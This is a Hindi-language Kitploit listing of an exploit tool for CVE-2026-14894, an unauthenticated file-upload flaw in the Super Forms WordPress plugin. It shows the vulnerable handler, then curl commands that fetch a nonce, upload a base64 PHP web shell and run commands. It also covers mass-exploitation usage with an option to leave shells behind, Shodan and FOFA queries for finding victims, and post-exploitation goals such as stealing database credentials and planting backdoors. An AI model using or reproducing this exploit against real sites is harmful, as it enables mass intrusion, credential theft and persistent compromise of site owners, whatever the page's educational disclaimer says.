Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-14894 — Super Forms अप्रमाणित फ़ाइल अपलोड RCE | CVSS 9.8 | Kitploit
उपकरण/GitHubGitHub/shinthink/cve-2026-14894
टोहीपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubshinthink/cve-2026-14894

CVE-2026-14894

Super Forms अप्रमाणित फ़ाइल अपलोड RCE | CVSS 9.8

1111 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CVE-2026-14894 — Super Forms अनधिकृत फ़ाइल अपलोड RCE

Nonce लीक → datauristring अपलोड → कोड निष्पादन


अवलोकन

CVE-2026-14894 Super Forms – Drag & Drop Form Builder WordPress प्लगइन (WebRehab द्वारा) के संस्करण ≤ 6.3.313 में एक गंभीर (CVSS 9.8) अनधिकृत मनमाना फ़ाइल अपलोड भेद्यता है।

super_submit_form nopriv AJAX हैंडलर फ़ॉर्म सबमिशन के माध्यम से फ़ाइल अपलोड स्वीकार करता है:

  1. उपयोगकर्ता के प्रमाणीकरण की जाँच किए बिना
  2. फ़ाइल प्रकार या एक्सटेंशन को मान्य किए बिना
  3. MIME सामग्री को मैजिक बाइट्स के विरुद्ध जाँच किए बिना

nonce अवरोध को आसानी से दरकिनार किया जाता है — एक अलग nopriv AJAX हैंडलर (super_create_nonce) किसी भी अनधिकृत विज़िटर के लिए वैध nonce उत्पन्न करता है।

हमलावर Base64-एन्कोडेड datauristring पेलोड के माध्यम से मनमानी PHP फ़ाइलें अपलोड करते हैं जो सीधे /wp-content/uploads/superforms/ में हमलावर-नियंत्रित फ़ाइलनाम के साथ लिखी जाती हैं — जिसके परिणामस्वरूप प्रत्यक्ष कोड निष्पादन होता है।

प्रभावित संस्करण

संस्करणस्थिति
≤ 6.3.313असुरक्षित
6.3.314+पैच किया गया

सक्रिय स्थापनाएँ: 600,000+
खोजकर्ता: andrea bocchetti Wordfence के माध्यम से (7 जुलाई, 2026)


भेद्यता तंत्र

मूल कारण

Super Forms के AJAX फ़ाइल अपलोड हैंडलर में तीन लापता सुरक्षा जाँचें:

root@kitploit:~
// Vulnerable: nopriv AJAX — no auth, no file type validation, no MIME check
add_action('wp_ajax_nopriv_super_create_nonce', 'super_create_nonce');  // nonce for anyone
add_action('wp_ajax_nopriv_super_submit_form', 'super_submit_form');   // upload for anyone

function super_submit_form() {
    $data = json_decode(stripslashes($_POST['data']), true);
    $file = $data['sf_upload_field']['files'][0];
    $content = base64_decode($file['datauristring']);  // no MIME validation
    $name = $file['value'];                             // no filename sanitization
    fwrite(fopen($upload_path . $name, 'w'), $content); // PHP written to disk
}

Nonce बाइपास

root@kitploit:~
// Anyone can get a valid nonce — no authentication required
function super_create_nonce() {
    $nonce = md5(uniqid(rand(), true));
    $_SESSION['sf_nonce'] = $nonce;
    echo $nonce;  // returned to unauthenticated attacker
}

हमला प्रवाह

root@kitploit:~
1. POST /wp-admin/admin-ajax.php?action=super_create_nonce
   → वैध nonce प्राप्त करें (कोई प्रमाणीकरण आवश्यक नहीं)

2. POST /wp-admin/admin-ajax.php?action=super_submit_form
   sf_nonce=NONCE&form_id=1&data={"sf_upload_field":{"files":[{
     "datauristring":"data:image/png;base64,PD9waHAgc3lzdGVt...",
     "value":"shell.php"}]}}
   → शेल /wp-content/uploads/superforms/ में लिखा गया

3. GET /wp-content/uploads/superforms/shell.php?c=id
   → RCE की पुष्टि

स्थापना

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-14894.git
cd CVE-2026-14894
pip install -r requirements.txt

उपयोग

root@kitploit:~
# एकल लक्ष्य
python cve_2026_14894.py -t target.com

# सामूहिक शोषण
python cve_2026_14894.py -f targets.txt

# सामूहिक शोषण + परिणाम सहेजें
python cve_2026_14894.py -f targets.txt -o shells.txt

# लक्ष्य पर शेल छोड़ें
python cve_2026_14894.py -t target.com --no-cleanup

# डीबग मोड (प्रत्येक अनुरोध दिखाएं)
python cve_2026_14894.py -t target.com --debug

तर्क

root@kitploit:~
  -t, --target      एकल लक्ष्य (डोमेन या IP)
  -f, --file        लक्ष्य सूची, प्रति पंक्ति एक
  -o, --output      RCE परिणाम फ़ाइल में सहेजें
  --threads         समवर्ती कार्यकर्ता (डिफ़ॉल्ट: 30)
  --no-cleanup      लक्ष्य पर शेल छोड़ें
  --debug           प्रत्येक HTTP अनुरोध + चरण रीयल-टाइम में दिखाएं
  -v, --verbose     विस्तृत आउटपुट दिखाएं

प्रूफ़ ऑफ़ कॉन्सेप्ट

एकल लक्ष्य

root@kitploit:~
$ python cve_2026_14894.py -t target.com --debug
root@kitploit:~
  Super Forms | CVE-2026-14894 | CVSS 9.8

  [target.com] [+] Super Forms पाया गया v6.3.312
  [target.com] [*] Nonce प्राप्त हुआ
  [target.com] [*] शेल अपलोड हो रहा है...
  [target.com] [!] RCE की पुष्टि हुई

  होस्ट       : target.com
  SuperForms : हाँ v6.3.312
  अपलोड      : हाँ
  RCE         : हाँ
  शेल        : https://target.com/wp-content/uploads/superforms/think_abc.php?t=TOKEN
  आउटपुट     : uid=33(www-data) gid=33(www-data)
  समय        : 2.1s

सामूहिक स्कैन

root@kitploit:~
  लक्ष्य: 2500  |  थ्रेड: 30

  [RCE]    target-vuln-01.com                                 2.1s  v6.3.312
  [UP]     target-patched-02.com                              1.8s  v6.3.314 (अपलोड अवरुद्ध)
  [!]      target-no-plugin-03.com                            0.5s  स्थापित नहीं
  [150/2500] 6%  |  SuperForms:47  Upload:18  RCE:12

  ───────────────────────────────────────────────────────
  समाप्त | 180s | लक्ष्य:2500 Det:47 Upload:18 RCE:12

मैन्युअल शोषण

चरण 1 — nonce प्राप्त करें

root@kitploit:~
curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -d 'action=super_create_nonce'
# 96-कैरेक्टर हेक्स nonce लौटाता है

चरण 2 — PHP शेल अपलोड करें

root@kitploit:~
NONCE="abc123..."
SHELL_B64=$(echo '<?php system($_GET["c"]); ?>' | base64 -w0)

curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -d 'action=super_submit_form' \
  -d "sf_nonce=$NONCE" \
  -d 'form_id=1' \
  -d 'data={"sf_upload_field":{"type":"files","files":[{"datauristring":"data:image/png;base64,'$SHELL_B64'","value":"shell.php","name":"shell.php","label":"attachment"}]}}'

चरण 3 — कमांड निष्पादित करें

root@kitploit:~
curl -sk 'https://target.com/wp-content/uploads/superforms/shell.php?c=id'

FOFA Dork

root@kitploit:~
body="wp-content/plugins/super-forms"

Shodan

root@kitploit:~
http.html:"super-forms"

प्रभाव

सफल शोषण से वेब सर्वर उपयोगकर्ता के रूप में दूरस्थ कोड निष्पादन प्राप्त होता है। वहाँ से:

  • wp-config.php निकालें → डेटाबेस क्रेडेंशियल्स
  • सभी WordPress सामग्री, उपयोगकर्ता और प्लगइन डेटा तक पहुँच
  • स्थायी बैकडोर तैनात करें
  • आंतरिक नेटवर्क में प्रवेश करें

अस्वीकरण

केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए।

यह सॉफ़्टवेयर सुरक्षा पेशेवरों के लिए है जो अधिकृत पैठ परीक्षण कर रहे हैं, संगठन अपने स्वयं के बुनियादी ढांचे का ऑडिट कर रहे हैं, और शोधकर्ता भेद्यता शोषण का अध्ययन कर रहे हैं।

कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है और इसका उल्लंघन हो सकता है:

  • संयुक्त राज्य अमेरिका: Computer Fraud and Abuse Act (18 U.S.C. 1030)
  • इंडोनेशिया: UU ITE Pasal 30 & 46
  • यूरोपीय संघ: Directive 2013/40/EU
  • यूनाइटेड किंगडम: Computer Misuse Act 1990

लेखक दुरुपयोग के लिए कोई दायित्व नहीं मानते।


संदर्भ

संसाधनलिंक
Wordfence परामर्श

यह परियोजना WebRehab या Super Forms से संबद्ध नहीं है।

टूल डाउनलोड करें
wordfence.com
IONIX परामर्शionix.io
NVD प्रविष्टिCVE-2026-14894
शोधकर्ताandrea bocchetti